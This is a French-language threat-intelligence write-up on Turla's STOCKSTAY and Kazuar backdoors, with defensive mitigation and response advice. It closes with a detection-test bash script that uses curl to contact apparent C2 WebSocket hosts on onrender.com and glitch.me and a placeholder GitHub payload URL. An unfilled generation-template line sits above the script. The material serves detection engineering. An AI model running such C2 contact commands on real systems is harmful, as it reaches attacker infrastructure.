SOC Prime Bias: Critique

14 Jul 2026 15:35 UTC

Turla (Tempête Secrète): Explication des Backdoors STOCKSTAY et Kazuar

Author Photo
SOC Prime Team linkedin icon Suivre
Turla (Tempête Secrète): Explication des Backdoors STOCKSTAY et Kazuar
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Turla est un groupe APT de longue date, aligné avec la Russie, associé au FSB et connu pour ses opérations de cyber-espionnage contre des cibles gouvernementales et militaires. Le groupe s’appuie sur des logiciels malveillants personnalisés, y compris les portes dérobées STOCKSTAY et Kazuar, pour préserver un accès à long terme dans des environnements compromis. Il abuse également fréquemment de services cloud légitimes tels que GitHub et Cloudflare pour dissimuler le trafic de commande et contrôle.

Enquête

Le rapport examine l’évolution des ensembles d’outils malveillants de Turla, en se concentrant sur les familles STOCKSTAY et Kazuar. Il analyse les techniques de détournement d’infrastructure du groupe, son utilisation de plateformes serverless pour le commandement et contrôle, et sa capacité à exploiter des vulnérabilités telles que la traversée de chemin WinRAR. L’enquête met également en évidence l’utilisation par Turla du keying environnemental pour réduire l’exposition à l’analyse sandbox.

Atténuation

Les organisations devraient déployer une surveillance rigoureuse pour l’utilisation non autorisée de plateformes web de confiance telles que GitHub et Cloudflare lorsque les modèles de trafic apparaissent anormaux. Un correctif rapide des vulnérabilités comme CVE-2025-8088 est essentiel pour prévenir les écritures de fichiers non autorisées. Les défenseurs devraient également surveiller l’installation non autorisée de certificats racine et l’exécution suspecte de PowerShell ou VBScript pouvant indiquer une activité Turla.

Réponse

Si une activité Turla est détectée, les intervenants devraient isoler les hôtes affectés et enquêter sur les comptes d’administrateur local non autorisés. Un examen détaillé des arbres de processus devrait être effectué pour découvrir les chargements latéraux de DLL impliquant des binaires légitimes tels que les utilitaires de NVIDIA ou d’imprimante Brother. La télémétrie réseau devrait également être vérifiée pour un trafic WebSocket inhabituel, et le magasin de confiance de la machine devrait être examiné pour des changements de certificats suspects.

Flux d’Attaque

Exécution de simulation

Prérequis : La vérification de la télémétrie et de la ligne de base doit être passée.

Rationale : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le narratif DOIVENT refléter directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront une mauvaise interprétation.

  • Narratif & Commandes de l’attaque : Un adversaire a réussi à établir une base et tente maintenant de lancer une communication C2. Pour échapper à la détection, il utilise une approche « vivre-sur-le-terrain » en se connectant à une plateforme serverless hébergée sur onrender.com via une connexion WebSocket. Simultanément, il tente de récupérer une charge utile de second stade depuis un dépôt GitHub public pour se fondre dans le trafic des développeurs. La simulation utilisera curl and wscat (si disponible) ou des requêtes web standard pour générer les modèles d’URL spécifiques définis dans la logique de détection.

  • Script de test de régression : [Provide the exact, self-contained, and executable code snippet for the simulation.]

    #!/bin/bash
    # Script de simulation pour la validation de détection C2 de STOCKSTAY
    
    echo "[+] Démarrage de la simulation : TTPs de STOCKSTAY C2"
    
    # 1. Déclencheur : C2 via WebSocket sur Render (URL Spécifique)
    echo "[*] Simulation de la connexion WebSocket à l'URL Render malveillante..."
    curl -k "wss://google-ai-labs-it.onrender.com/ws"
    
    # 2. Déclencheur : C2 via WebSocket sur Glitch (URL Spécifique)
    echo "[*] Simulation de la connexion WebSocket à l'URL Glitch malveillante..."
    curl -k "wss://wool-basalt-clock.glitch.me/ws"
    
    # 3. Déclencheur : Mise en scène sur GitHub (Correspondance de domaine large)
    echo "[*] Simulation de la mise en scène de charge utile via GitHub..."
    curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh"
    
    echo "[+] Simulation complète. Vérifiez les alertes SIEM."
  • Commandes de nettoyage :

    # Aucun artefact persistant n'est créé sur l'hôte par cette simulation.
    # Assurez-vous que tout fichier bash temporaire est supprimé s'il a été créé.
    rm -f simulation_stockstay.sh